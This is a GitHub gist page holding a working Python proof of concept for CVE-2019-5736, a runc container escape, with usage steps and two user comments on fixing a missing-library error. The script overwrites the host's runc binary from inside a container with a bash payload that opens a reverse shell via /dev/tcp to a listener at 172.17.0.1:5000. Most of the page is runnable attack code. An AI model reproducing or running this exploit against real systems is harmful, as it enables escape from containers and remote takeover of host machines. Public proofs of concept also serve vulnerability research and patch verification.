Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
PoC for CVE-2019-5736 in Python
#!/bin/python3
# Silly PoC for CVE-2019-5736 in Python by @singe (with help from @_staaldraad, @frichette_n & @_cablethief)
# Target will need a python3 interpreter
# Edit IP info below, on the host run a netcat to catch the reverse shell
# Run this python file in the container
# Then from the host: docker exec -i <container name> /tmp/evil
import os
import stat
host='172.17.0.1'
port='5000'
payload=f'#!/bin/bash\necho "exec 5<>/dev/tcp/{host}/{port} && cat <&5|/bin/bash 2>&5 >&5"|/bin/bash\n'
target_file='/tmp/evil'
if __name__ == '__main__':
with open(target_file,'w') as evil:
evil.write('#!/proc/self/exe --criu')
os.chmod(target_file,stat.S_IXOTH)
found = 0
while found == 0:
procs = os.popen('ps -A -o pid')
for pid in procs:
pid = pid.strip()
if pid == 'PID': continue
if int(pid) > os.getpid():
try:
with open(f'/proc/{pid}/cmdline','r') as cmdline:
if cmdline.read().find('runc') >= 0:
found = pid
except FileNotFoundError:
continue
except ProcessLookupError:
continue
handle = -1
while handle == -1:
try:
handle = os.open(f'/proc/{found}/exe', os.O_PATH) #/proc/xxx/exe is fd to runcinit
except FileNotFoundError:
continue
except PermissionError:
continue
print('Got file handle')
write_handle = 0;
while write_handle == 0:
try:
write_handle = os.open(f'/proc/self/fd/{str(handle)}',os.O_WRONLY|os.O_TRUNC)
except OSError:
continue
print('Got write handle')
result = os.write(write_handle,str.encode(payload))
if result == len(payload):
print('Successfully wrote payload')
else:
print('Could not write')
@zoobab

This comment has been minimized.

Copy link

commented Feb 14, 2019

I run the script inside a python:3 container, the host being an ubuntu xenial with docker 17.03:

$ docker exec -i c9c0f3989fd8 /tmp/evil
/proc/self/exe: error while loading shared libraries: libapparmor.so.1: cannot open shared object file: No such file or directory
@zoobab

This comment has been minimized.

Copy link

commented Feb 14, 2019

I needed to do an apt-get install libseccomp2 libapparmor1 inside the container to solve the error.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.